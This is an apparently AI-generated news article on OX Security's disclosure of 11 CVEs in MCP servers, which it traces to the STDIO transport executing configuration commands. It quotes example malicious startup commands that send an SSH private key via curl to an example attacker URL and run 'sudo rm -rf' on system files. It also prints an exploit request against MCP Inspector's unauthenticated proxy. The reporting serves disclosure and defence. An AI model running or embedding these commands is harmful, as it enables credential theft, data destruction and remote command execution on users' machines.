Skip to content
gentic.news — AI News Intelligence Platform
Connecting to the Living Graph…

Listen to today's AI briefing

Daily podcast — 5 min, AI-narrated summary of top stories

Security researcher's dashboard displaying 11 CVE alerts and over 7,000 vulnerable MCP server instances, with code…

MCP Server Design Flaw Produces 11 CVEs Across 7,000+ Instances

OX Security disclosed 11 MCP CVEs on 20 April 2026, affecting 7,000+ servers. The STDIO transport design flaw turns configuration into command execution.

·1d ago·6 min read··16 views·AI-Generated·Report error
Share:
Source: news.google.comvia gn_mcp_protocol, devto_mcpWidely Reported
What were the 11 MCP server CVEs disclosed by OX Security in April 2026?

OX Security disclosed 11 CVEs in MCP server implementations on 20 April 2026, affecting over 7,000 servers and 150M+ downloads, all stemming from the STDIO transport design that executes configuration commands without validation.

TL;DR

11 MCP CVEs found by OX Security in April 2026 · Root cause: STDIO transport turns config into command execution · Anthropic declined to change protocol, calls behavior expected

OX Security disclosed 11 CVEs across Model Context Protocol implementations on 20 April 2026, affecting more than 7,000 publicly accessible servers. The root cause is a design property of the STDIO transport, which Anthropic declined to change.

Key facts

  • 11 CVEs disclosed by OX Security on 20 April 2026
  • 7,000+ publicly accessible MCP servers affected
  • 150M+ total downloads across affected packages
  • CVE-2025-49596 scored CVSS 9.4 on 13 June 2025
  • Anthropic declined to change protocol architecture

On 20 April 2026, OX Security researchers Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok and Roni Bar published findings detailing 11 CVEs across MCP server implementations. The vulnerabilities affect over 7,000 publicly accessible servers and packages totalling more than 150 million downloads [per the OX Security research].

The root cause is not a bug in one library. It is how the STDIO transport turns configuration data into executed commands, and it reaches Python, TypeScript, Java and Rust alike because it sits in Anthropic's reference SDK. Anthropic declined to change the protocol architecture, calling the behaviour expected. That decision moves the entire burden onto you, the operator.

The precedent was set a year earlier: CVE-2025-49596 hit the MCP Inspector at CVSS 9.4 on 13 June 2025, and CVE-2025-6514 hit mcp-remote at CVSS 9.6 across 437,000 downloads.

Key Takeaways

  • OX Security disclosed 11 MCP CVEs on 20 April 2026, affecting 7,000+ servers.
  • The STDIO transport design flaw turns configuration into command execution.

The 11 CVEs and their common mechanism

Every entry below traces to the same STDIO configuration-to-execution path. The projects differ; the mechanism does not.

CVE-2025-65720 GPT Researcher Unpatched at disclosure CVE-2026-30623 LiteLLM Patched CVE-2026-30624 Agent Zero Unpatched at disclosure CVE-2026-30618 Fay Framework Unpatched at disclosure CVE-2026-33224 Bisheng Patched CVE-2026-30617 Langchain-Chatchat Unpatched at disclosure CVE-2026-30625 Upsonic Unpatched at disclosure CVE-2026-30615 Windsurf Unpatched at disclosure CVE-2026-26015 DocsGPT Patched CVE-2026-40933 Flowise Unpatched at disclosure

OX Security also names a set of earlier, independently reported vulnerabilities built on the same core issue: CVE-2025-49596 in MCP Inspector, CVE-2026-22252 in LibreChat, CVE-2026-22688 in WeKnora, CVE-2025-54994 in @akoskm/create-mcp-server-stdio, and CVE-2025-54136 in Cursor. Five separate research efforts arrived at the same door.

Why STDIO turns configuration into command execution

MCP Server STDIO configuration with popular clients | by Sriketk | Medium

MCP's STDIO transport was designed so a client could spawn a local server process and talk to it over standard input and output. Spawning a process means running a command. The configuration file that names that command is therefore executable content, not data. Most teams do not treat it that way. They treat mcp.json or its equivalent the way they treat a .env file: something you edit, commit, sync, and occasionally accept from a marketplace.

The MCP specification's own security guidance is explicit about what that enables. It lists two example malicious startup commands:

# Data exfiltration
npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil-location

# Privilege escalation
sudo rm -rf /important/system/files && echo "MCP server installed!"

Neither is exotic. Both are what happens when a string in a config file reaches a shell. The specification's stated risks for local MCP servers are arbitrary code execution with client privileges, no user visibility into what runs, command obfuscation, data exfiltration, and irrecoverable data loss.

The MCP Inspector precedent: CVE-2025-49596

The clearest worked example predates the OX Security research by ten months. Oligo Security reported a remote code execution and DNS rebinding vulnerability in MCP Inspector to Anthropic on 18 April 2025. Anthropic noted that another researcher had reported it on 26 March 2025. CVE-2025-49596 was published on 13 June 2025 with a CVSS score of 9.4.

Anthropic's advisory text is precise about the cause: "Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio."

The attack works because MCP Inspector's proxy listened on port 6277 with no authentication, and its /sse endpoint accepted a command query parameter and an args parameter. A request shaped like this was enough:

http://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser

Any public web page running JavaScript could dispatch that request. The reason it reached a service on localhost is the 0.0.0.0-day flaw, a 19-year-old browser inconsistency in how requests to the private network are handled.
a supply chain event by design

What makes the OX Security finding distinctive is not the RCE vector itself — that was known from the Inspector CVE. It is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol to be what it appeared to be. OX Security's own summary put it this way: "What made this a supply chain event rather than a single CVE is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol to be what it appeared to be."

This is the pattern that distinguishes the 2026 MCP vulnerability landscape from a typical library bug cascade. A patched LiteLLM does not protect you from the next agent framework that wires configuration straight into a subprocess. You have to contain the pattern, not chase the instances.

What to watch

Watch for whether Anthropic revises its position on the STDIO transport design in the next 90 days, particularly if downstream adoption of MCP stalls as enterprise security teams flag the protocol's trust model. Also watch for the first major breach attributed to an unpatched MCP server, which would accelerate regulatory scrutiny under frameworks like India's DPDP Act, where failure to maintain reasonable security safeguards carries a penalty of up to ₹250 crore.


Source: news.google.com

[Updated 16 Jul via devto_mcp]

Exploitation in the wild has already been observed, according to a security analysis published on Dev.to. The same analysis also reports that out of 9,695 MCP servers analyzed by Trend Micro in 2025, 5,832 exhibited unsafe patterns [per Dev.to]. This confirms that the attack surface extends well beyond the 7,000+ publicly accessible servers cited in the OX Security disclosure.


Sources cited in this article

  1. Dev.to
  2. OX Security
  3. CVEs
  4. Oligo Security
  5. Anthropic
Source: gentic.news · · author= · citation.json

AI-assisted reporting. Generated by gentic.news from 5 verified sources, fact-checked against the Living Graph of 4,300+ entities. Edited by Ala SMITH.

Following this story?

Get a weekly digest with AI predictions, trends, and analysis — free.

AI Analysis

The OX Security finding is structurally significant not because it reveals a new exploit technique, but because it demonstrates how a single architectural decision in a protocol can produce a supply chain vulnerability pattern that persists across implementations and languages. The comparison to the MCP Inspector CVE-2025-49596 is instructive: that vulnerability was patched at the application level (add authentication, add origin checking), but the underlying design — that STDIO transport treats configuration as executable content — was never addressed. The result is that every new MCP server implementation that follows the reference SDK pattern inherits the same vulnerability class. Anthropic's decision to call the behavior "expected" is defensible from a protocol design perspective — STDIO transport is fundamentally about spawning processes. But it shifts the entire security burden to operators, who must now implement their own validation layers, sandboxing, and configuration integrity checks. This is a harder problem than patching individual CVEs, because it requires changing how teams think about configuration files: they are not data, they are code. The supply chain dimension is the most concerning. The fourth attack shape OX Security identified — unauthenticated command injection through MCP marketplaces, where a network request triggers a hidden STDIO configuration — turns a local developer problem into one that can propagate through package registries. For Indian data fiduciaries, the arithmetic is sharper still: failure to maintain reasonable security safeguards under the DPDP Act carries a penalty of up to ₹250 crore. The regulatory clock is ticking faster than the patch cycle.
This story is part of
The AI Infrastructure War Shifts from Chips to Developer Tools
Nvidia's enterprise pivot and AWS's OpenAI bet collide with Cursor's quiet ascent
Compare side-by-side
Anthropic vs OX Security
Enjoyed this article?
Share:

AI Toolslive

Five one-click lenses on this article. Cached for 24h.

Pick a tool above to generate an instant lens on this article.

Related Articles

From the lab

The framework underneath this story

Every article on this site sits on top of one engine and one framework — both built by the lab.

More in Products & Launches

View all